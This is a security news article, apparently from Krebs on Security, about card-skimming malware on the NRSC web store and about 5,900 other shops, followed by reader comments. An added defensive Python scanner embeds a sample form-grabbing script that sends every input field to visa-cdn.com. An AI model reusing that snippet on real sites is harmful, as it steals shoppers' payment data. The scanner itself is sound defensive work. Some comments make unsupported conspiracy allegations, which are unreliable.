Krebs on Security

In-depth security news and investigation

Hackers Hit U.S. Senate GOP Committee

The national news media has been consumed of late with reports of Russian hackers breaking into networks of the Democratic National Committee. Lest the Republicans feel left out of all the excitement, a report this past week out of The Netherlands suggests Russian hackers have for the past six months been siphoning credit card data from visitors to the Web storefront of the National Republican Senatorial Committee (NRSC).

That’s right: If you purchased a “Never Hillary” poster or donated funds to the NRSC through its Web site between March 2016 and the first week of this month, there’s an excellent chance that your payment card data was siphoned by malware and is now for sale in the cybercrime underground.

News of the break-in comes from Dutch researcher Willem De Groot, co-founder and head of security at Dutch e-commerce site byte.nl. De Groot said the NRSC was one of more than 5,900 e-commerce sites apparently hacked by the same actors, and that the purloined card data was sent to a network of servers operated by a Russian-language Internet service provider incorporated in Belize.

De Groot said he dissected the malware planted on the NRSC’s site and other servers (his analysis of the malware is available here) and found that the hackers used security vulnerabilities or weak passwords to break in to the various e-commerce sites.

The researcher found the malware called home to specific Web destinations made to look like legitimate sites associated with e-commerce activity, such as jquery-cloud[dot]net, visa-cdn[dot]com, and magento-connection[dot]com.

“[The attackers] really went out of their way to pick domain names that look legitimate,” De Groot said.

The NRSC did not respond to multiple requests for comment, but a cached copy of the site’s source code from October 5, 2016 indicates the malicious code was on the site at the time (load this link, click “view source” and then Ctrl-F for “jquery-cloud.net”).

A majority of the malicious domains inserted into the hacked sites by the malware map back to a few hundred Internet addresses assigned to a company called dataflow[dot]su.

Dataflow markets itself as an “offshore” hosting provider with presences in Belize and The Seychelles. Dataflow has long been advertised on Russian-language cybercrime forums as an offshore haven that offers so-called “bulletproof hosting,” a phrase used to describe hosting firms that court all manner of sites that most legitimate hosting firms shun, including those that knowingly host spam and phishing sites as well as malicious software.

De Groot published a list of the sites currently present at Dataflow. The list speaks for itself as a collection of badness, including quite a number of Russian-language sites selling synthetic drugs and stolen credit card data.

According to De Groot, other sites that were retrofitted with the malware included e-commerce sites for the shoe maker Converse as well as the automaker Audi, although he says those sites and the NRSC’s have been scrubbed of the malicious software since his report was published.

But De Groot said the hackers behind this scheme are continuing to find new sites to compromise.

“Last Monday my scans found about 5,900 hacked sites,” he said. “When I did another scan two days later, I found about 340 of those had been fixed, but that another 170 were newly compromised.”

According to the researcher’s analysis, many of the hacked sites are running outdated e-commerce software or content management software. In other cases, it appears the attackers simply brute-forced or guessed passwords needed to administer the sites.

Further, he said, the attackers appear to have inserted their malware into the e-commerce sites’ databases, rather than into the portion of the Web server used to store HTML and other components that make up how the site looks to visitors.

“That’s why I think this has remained under the radar for a while now,” De Groot said. “Because some companies use filesystem checkers so that if some file changes on the system they will get a notice that alerts them something is wrong.”

Unfortunately, those same checking systems generally aren’t configured to look for changes in the site’s database files, he explained, since those are expected to change constantly — such as when a new customer order for merchandise is added.

De Groot said he was amazed at how many e-commerce merchants he approached about the hack dismissed the intrusion, reasoning that they employed secure sockets layer (SSL) technology that encrypted the customers’ information end-to-end.

What many Webmasters fail to realize is that just as PC-based trojan horse programs can steal data from Web browsers of infected victims, Web-based keylogging programs can do the same, except they’re designed to steal data from Web server applications.

PC Trojans siphon information using two major techniques: snarfing passwords stored in the browser, and conducting “form grabbing” — capturing any data entered into a form field in the browser before it can be encrypted in the Web session and sent to whatever site the victim is visiting.

Web-based keyloggers also can do form grabbing, ripping out form data submitted by visitors — including names, addresses, phone numbers, credit card numbers and card verification code — as customers are submitting the data during the online checkout process.
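A defender’s check for what the two passages above describe: a skimmer stored in the shop’s database, where file-integrity monitoring never looks, that does browser-side form grabbing. This is an added example, not De Groot’s tooling or anything from the article; it walks rows dumped from a site’s config/CMS tables, parses any stored HTML, and flags script tags loading from the call-home domains named in the article or from a host outside an allow-list, plus inline scripts that both read form fields and send data out. The table names, the allowed host and the sample rows are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
KNOWN_BAD = {"jquery-cloud.net", "visa-cdn.com", "magento-connection.com"}  # named in the article
ALLOWED = {"cdn.example-shop.test"}  # the shop's own script host: assumed for this example
# Form-grabber heuristic: an inline script that reads form fields AND ships data out.
READS_FORM = re.compile(r"document\.forms|querySelectorAll\(['\"](?:input|form)|\.value\b")
EXFILS = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(\)|\.src\s*=")

class ScriptFinder(HTMLParser):
    """Collect hosts of external <script src> tags and the bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(urlparse(src).hostname or "")
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def scan_rows(rows):
    """rows: iterable of (table, row_id, text); returns {'table:id': [(reason, detail), ...]}."""
    report = {}
    for table, row_id, text in rows:
        p = ScriptFinder()
        p.feed(text)
        p.close()
        hits = [("known skimmer host", h) if h in KNOWN_BAD else ("script from unknown host", h)
                for h in p.external if h and h not in ALLOWED]
        hits += [("inline script reads form fields and sends them out", b.strip()[:40])
                 for b in p.inline if READS_FORM.search(b) and EXFILS.search(b)]
        if hits:
            report[f"{table}:{row_id}"] = hits
    return report

# Constructed sample rows standing in for a dump of the shop's config/CMS tables.
SAMPLE_ROWS = [
    ("core_config_data", 1, '<script src="https://cdn.example-shop.test/app.js"></script>'),
    ("core_config_data", 2, '<script src="//jquery-cloud.net/jquery.min.js"></script>'),
    ("cms_block", 7, "<script>document.forms[0].onsubmit=function(){var d='';for(var i of "
     "document.querySelectorAll('input'))d+=i.value+'|';new Image().src='//visa-cdn.com/c.gif?d='+btoa(d);}</script>"),
]
```

Running `scan_rows(SAMPLE_ROWS)` flags row 2 as a known skimmer host and row 7 as a form grabber, while the shop’s own script in row 1 passes; feed it the output of a database dump to run it for real.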

These attacks drive home one immutable point about malware’s role in subverting secure connections: Whether resident on a Web server or on an end-user computer, if either endpoint is compromised, it’s ‘game over’ for the security of that Web session.

With PC banking trojans, it’s all about surveillance on the client side pre-encryption, whereas what the bad guys are doing with these Web site attacks involves sucking down customer data post- or pre-encryption (depending on whether the data was incoming or outgoing).

This entry was posted on Monday, October 17th, 2016 at 10:06 am and is filed under Other.

But ya know, the internet police are not all that concerned unless it’s about someone running a server for P2P/Torrent sharing of illegal files. There are special circumstances though such as Julian Assange that attract attention.

The problem is closer to home than this article suggests. If you look at the ipout.zip data at crimeflare.com/zippy.html you will find 186 additional unique domains from that same Dataflow 80.87.205.0/24 block. These domains use CloudFlare for their front-end.

“…it appears the attackers simply brute-forced or guessed passwords needed to administer the sites.”

Far too many systems have nothing to prevent rapid fire password guessing. Often thousands of password guesses per second still don’t raise any alarm or prevention measures. Even an additional few seconds of login response time delay would thwart guessing, but would hardly be noticed by real users.

I give up. It’s clear that we can’t beat the hackers. All we can do now is wait for Google to fire up all the dark fiber and sell us a nice new clean (family safe), private (invitation only), and safe (no foreign devils) internet.

A hosting company has to have an IP address block, and IP address blocks can be denied/blocked/firewalled. Linux has a great tool for that called UFW (Uncomplicated Firewall). It has allowed blocking of most of Vietnam’s IP addresses, and I’m starting on France and China, notorious origins of SSH attacks. However it takes a concerted effort on the part of all players, such as ISPs to block out offending hosting companies. Currently ISPs have no fiscal incentive to do so.

That being said, is there any software for checking CMS databases for malware? I’ve some Drupal sites that need checking, just to be safe.

Sounds like they found all the NSA tools left on that server by an NSA operative. Live Free or Die, I will take my chances, but I will never live in fear as my fellow countrymen do. I don’t make purchases or use a PC to bank on the net, I don’t own a phone either. We all know who the biggest hackers are, and it ain’t the Russians or the Chinese. Live by the sword, die by the sword.

We already know who you are. 😉
You listed several things you don’t do because of your fears that many others are not afraid to do. That belies your assertion that you don’t live in fear as others do. I can guarantee your comment generates more notice than the box of diapers I purchased on Amazon.

A Navy Seal friend of mine has reminded me that traditionally the easiest way to break into a group’s data processing units is to already have the necessary information needed, which is obtainable by graft, blackmail, or from ‘political dissenters.’

I would like to believe that none of the above occurred, until I look at Chinese copies of our advanced weapon systems and allegedly Israeli films of Bill Clinton in extremely compromising positions with 13 year old minor females.

What good is all the security in the world, if our allies are able to pull off scams, though I will acknowledge had my ancestors been the objects of the Holocaust, a national policy of blackmail (or whatever it takes) to assure it never happens again is fully understandable.

Snopes seems good for “internet folk tales,” but when it involves business or politics it too often is a source of disinformation. Same goes for media fluff. The fewer corrections made to Snopes the better since I have no desire to improve their impression of reliability.

Currently the Big Two types of hackers are 1) cyber criminals who hack for profit and 2) government agencies that use hacking to commit espionage. I think in the future, you should clearly identify to which group your articles refer.

It is noteworthy that when members of the US government say “the Russians,” they are NOT castigating Russian cyber criminals. They are attributing hacking to the Russian government.

So, as to THIS article, when you say, “Russian hackers,” which group do you mean? Further down you mention “Russian-language cybercrime forums” which suggests profit, not espionage. Nevertheless, I think you should be clear on this point since the article is about hacking a group that is generally thought of as political, not commercial.

Since disguised links in emails are often used to spread malware I am wondering if people can make a habit of sending a “broken” url that the receiver can edit easily to get back the real link. For example: www . krebsonsecurity . com

If we made a practice of doing that then people who received clickable urls might become more suspicious of them.

Blaming the Russians is easy: they sort of invented cybercrime and exported it all over the world.
And it doesn’t matter if it’s government or criminals, nowhere else are they so closely intertwined.
I liked the sarc. about internet police 🙂
Crimeflare does not help in most cases but cloudflare helps the cybercriminals 4 sure.

I think the contents of the hacked information are much more disturbing than the source. We are getting a rare glimpse into the minds of those that govern and it is chilling. That the Russians or any other nation state are attempting to interfere with our elections is not a surprise–they learned that from the US government. We’ve not only interfered in elections worldwide but assassinated the leaders of other countries. I for one want more leaked information that shows just how corrupt our government has become on both sides of the aisle. This demonstrates the need for limited government which the constitution was designed to enforce and the need to draw back all the interventions into other countries costing 1000s of lives on both sides. Soon, I fear, all branches of government will be in lockstep providing nanny services with one hand while trampling on freedom with the other.

I’m so glad I never pay online. My mountains and trees are analog. My large format photography is analog. No surveillance cameras on our land.
Just eagles, wild boars, mountain goats etc. And Spanish mastiffs to protect us. Programming is as interesting as bookkeeping to me. Yuk!!
But why is it if I want to buy something online they insist on paypal and refuse a bank transfer? Another scam? We are pissing poor but are living like millionaires. Getting jealous? City whoopsies!

JPA makes a good point concerning broken links and the spread of malware. No matter how good computer security becomes, the true flaw will always be human error – a simple click on a link or opening up a picture which infects the computer/network.